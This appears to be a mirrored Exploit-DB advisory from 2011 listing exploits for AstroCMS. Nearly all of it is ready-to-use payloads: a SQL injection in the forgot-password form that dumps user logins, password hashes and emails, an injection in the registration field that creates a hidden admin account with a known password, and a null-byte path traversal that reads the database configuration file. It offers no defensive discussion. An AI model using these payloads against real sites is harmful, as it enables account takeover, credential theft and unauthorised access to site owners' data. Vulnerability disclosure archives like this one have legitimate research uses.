AstroCMS – Multiple Vulnerabilities

  • 作者: brain[pillow]
    日期: 2011-09-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17825/
  • # Exploit Title: AstroCMS Multiple Remote Vulnerabilities
    # Google Dork: none
    # Date: 12.03.2011
    # Author: brain[pillow]
    # Software Link: http://www.astrocms.com/
    # Version: UNKNOWN
    
    ============================================================
    FORGOT_PASSWORD SQL-INJ EXPLOIT:
    ============================================================
    
     /registration/forgot/
    
     a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0 from auth_users where id=5#
    
    id=6 - usually admin
    
    ============================================================
    REGISTER_USER EXPLOIT:
    ============================================================
     /registration/
    
    adrnin','4297f44b13955235245b2497399d7a93','adrnin ','okk@mail.com',1,5,'','','')#
    
    Submitting this to "login field" will add "adrnin" user with admin rights and password "123123".
    Usually 5 - is admin group.
    
    ============================================================
    READ FILE EXPLOIT:
    ============================================================
    
     /include/get_js.php4?fname=../htdocs/include/config_mysql.inc%00.js
    
    OR:
    
     /include/get_js.php?fname=../htdocs/include/config_mysql.inc%00.js